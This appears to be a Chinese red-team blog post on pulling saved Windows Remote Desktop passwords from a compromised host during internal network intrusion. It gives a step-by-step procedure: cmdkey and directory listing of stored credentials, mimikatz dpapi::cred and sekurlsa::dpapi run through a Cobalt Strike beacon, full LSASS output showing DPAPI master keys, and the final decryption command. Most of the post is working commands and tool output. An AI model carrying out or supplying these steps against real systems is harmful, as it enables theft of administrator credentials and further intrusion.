banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

内网渗透之获取windows远程桌面(RDP)连接记录密码

利用条件:就是 mstsc 连接的时候,管理员勾选了自动保存密码连接的选项。

# 可疑通过cmdkey /list查看是否保存了凭据
>cmdkey /list

image

1、查找本地的 Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

image

2、mimikatz

beacon> mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85

image

得到 guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}

3、使用 sekurlsa::dpapi

beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 788081 bytes
[+] received output:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-20


Authentication Id : 0 ; 283117 (00000000:000451ed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-BVVD8VFVMPR
Logon Server      : WIN-BVVD8VFVMPR
Logon Time        : 2022/6/20 12:24:48
SID               : S-1-5-21-2815261350-2957312007-627930173-500
	 [00000000]
	 * GUID      :	{877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
	 * Time      :	2022/6/25 13:14:36
	 * MasterKey :	7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
	 * sha1(key) :	d90d81651dc81f37b34698ac101cf04c094c0cde


Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-19


Authentication Id : 0 ; 46503 (00000000:0000b5a7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : 


Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-18
	 [00000000]
	 * GUID      :	{62dbbb7e-3978-4e4a-bdd4-65a7fa11a0ce}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	54ef76dfc016a1471d59ce8d179ba455a201ca749ace616058b6ef0b8573e558cedb185d57d0bc1be40238da47d16a1124f3a69bbaccaf5f5b2e61bd637e9b73
	 * sha1(key) :	6aff948e5a90e41f2edffd26da163af4f146b1a5
	 [00000001]
	 * GUID      :	{43ea2159-28dc-4507-90bd-751f19e7db5d}
	 * Time      :	2022/6/20 12:24:39
	 * MasterKey :	cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
	 * sha1(key) :	56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
	 [00000002]
	 * GUID      :	{0fefdf3f-162a-4a3f-a6df-6ec2dee82eb5}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	89012fd9de4903051a9b99225216df633efd8d1e014624f0a68670432da8fc1fda98babc447d5de1d3fe10069a6358be9a64fb1f634cf6012307465455757369
	 * sha1(key) :	3604ef0e99dab0ea49db307fd8950b8fd0d4d310
	 [00000003]
	 * GUID      :	{3d58f13e-ba7c-4457-835c-5a7f1353590c}
	 * Time      :	2022/6/25 13:12:50
	 * MasterKey :	c12ff664090f806ae980d32bfe19af5ba76f3d5f1dcad46e70da7affaede04c02ba00d5d75380fd4bd77f6cd535be3eec103f2f5048ceee96d61347e3d24d7ba
	 * sha1(key) :	be0643a97d988adcc8e5ae2b3d6df9702df32dc0

根据 guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6} 找到 masterkey

image

MasterKey

7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

4、解密

mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85 /masterkey:7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

cs 的 taowu 插件也有模块可以达到同样的效果,获取 windows 远程桌面的连接记录的密码

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。